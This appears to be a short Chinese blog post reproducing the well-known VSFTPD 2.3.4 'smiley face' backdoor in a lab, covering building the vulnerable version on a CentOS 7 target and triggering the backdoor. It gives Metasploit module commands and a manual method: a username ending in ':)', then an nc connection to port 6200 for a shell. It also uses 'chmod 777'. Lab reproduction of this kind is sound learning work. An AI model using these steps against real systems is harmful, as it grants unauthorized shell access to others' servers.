VSFTPD 2.3.4 笑脸漏洞

发表于2023-09-16更新于2023-09-17

字数总计:162阅读时长:1分钟阅读量: 提瓦特大陆

漏洞复现

VSFTPD 2.3.4 笑脸漏洞

Sword2023-09-162023-09-17

环境搭建

压缩包需要下载特定版本，官方提供的安装包没有这个漏洞

1.靶机环境是centos7 ，首先解压缩包，并上传到靶机目录

tar -zxvf 压缩包名称

2.进入vsftpd目录，赋予文件权限，之后进行make &&make install

cd /vsftpd-2.3.4

chmod 777 *

make &&make install

漏洞利用

code:1

使用msf利用

1
2
3

use exploit/unix/ftp/vsftpd_234_backdoor 
set RhoSTS 192.168.142.145
exploit

code:2

手动利用

打开命令行登录ftp服务器，在用户名处输入root:)然后随意输入一个密码回车等待，

输入nc 目标ip 6200 即可连接

Sword

本人很菜，希望各位师傅多多指教！

原创 VSFTPD 2.3.4 笑脸漏洞

本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sword的博客！

漏洞复现4

匿名评论隐私政策

博客快捷键

shift K

关闭快捷键功能

shift A

打开/关闭中控台

shift M

播放/暂停音乐

shift D

深色/浅色显示模式

shift S

站内搜索

shift R

随机访问

shift H

返回首页

shift F

友链鱼塘

shift L

友链页面

shift P

关于本站

shift I

原版/本站右键菜单

播放音乐

数据库加载中